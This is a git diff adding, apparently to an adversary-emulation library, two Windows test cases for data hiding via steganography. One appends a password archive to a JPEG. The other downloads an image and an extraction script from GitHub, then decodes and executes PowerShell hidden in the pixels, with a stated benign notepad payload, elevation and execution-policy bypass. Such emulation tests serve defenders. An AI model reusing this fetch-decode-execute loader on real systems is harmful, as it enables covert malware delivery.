diff --git a/atomics/T1001.002/T1001.002.yaml b/atomics/T1001.002/T1001.002.yaml new file mode 100644 index 00000000..de33960e --- /dev/null +++ b/atomics/T1001.002/T1001.002.yaml @@ -0,0 +1,148 @@ +attack_technique: T1001.002 +display_name: "Data Obfuscation via Steganography" +atomic_tests: + - name: Steganographic Tarball Embedding + auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b + description: | + This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) + within an image. + + The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a + file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image + file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball + file within the image, utilizing steganography techniques for data obfuscation. + + This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. + By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration. + supported_platforms: + - windows + input_arguments: + image_file: + description: Image file which will be downloaded to be used to hide data + type: path + default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg + tar_file: + description: Tarz file containing random passwords + type: path + default: $env:PUBLIC\Downloads\T1001.002.tarz + new_image_file: + description: new image file ready for extraction + type: path + default: $env:PUBLIC\Downloads\T1001.002New.jpg + passwords_file: + description: Text file containing random passwords + type: path + default: $env:TEMP\random_passwords.txt + dependency_executor_name: powershell + dependencies: + - description: | + Image file must exist + prereq_command: | + if (!(Test-Path "#{image_file}")) {exit 1} else { + {exit 0} + } + get_prereq_command: | + New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null + Write-Output "Downloading image file..." + $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg" + Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}" + - description: | + File to hide within tarz file must exist + prereq_command: | + if (!(Test-Path "#{passwords_file}")) {exit 1} else { + {exit 0} + } + get_prereq_command: | + Write-Output "Generating random passwords and saving to file..." + $passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 } + $passwords | Out-File -FilePath "#{passwords_file}" + - description: | + Tarz file to embed in image must exist + prereq_command: | + if (!(Test-Path "#{tar_file}")) {exit 1} else { + {exit 0} + } + get_prereq_command: | + Write-Output "Generating tarz file..." + tar -cvf "#{tar_file}" "#{passwords_file}" + executor: + name: powershell + elevation_required: true + command: | + Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte + cleanup_command: | + Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore + Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore + + + - name: Embedded Script in Image Execution via Extract-Invoke-PSImage + auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6 + description: | + This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. + The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden + within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems. + + The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden + PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a + separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed. + + In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This + is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file. + supported_platforms: + - windows + input_arguments: + image_file: + description: Malicious Image file which will be downloaded + type: path + default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg + psimage_script: + description: Extract-Invoke-PSImage Script downloaded + type: path + default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1 + dependency_executor_name: powershell + dependencies: + - description: | + Image file must exist + prereq_command: | + if (!(Test-Path "#{image_file}")) {exit 1} else { + {exit 0} + } + get_prereq_command: | + New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null + Write-Output "Downloading image file..." + $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg" + Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file} + - description: | + Extract-Invoke-PSImage must exist + prereq_command: | + if (!(Test-Path "#{psimage_script}")) {exit 1} else { + {exit 0} + } + get_prereq_command: | + New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null + Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..." + $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1" + Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script} + executor: + name: powershell + elevation_required: true + command: | + cd "PathToAtomicsFolder\ExternalPayloads\" + Import-Module .\Extract-Invoke-PSImage.ps1 + $extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1" + $scriptContent = Get-Content "$HOME\result.ps1" -Raw + $base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])" + $base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value } + $base64Strings | Set-Content "$HOME\decoded.ps1" + $decodedContent = Get-Content "$HOME\decoded.ps1" -Raw + $decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent)) + $textPattern = '^.+' + $textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value } + $scriptPath = "$HOME\textExtraction.ps1" + $textMatches -join '' | Set-Content -Path $scriptPath + . "$HOME\textExtraction.ps1" + cleanup_command: | + Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore + Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore + Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore + Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore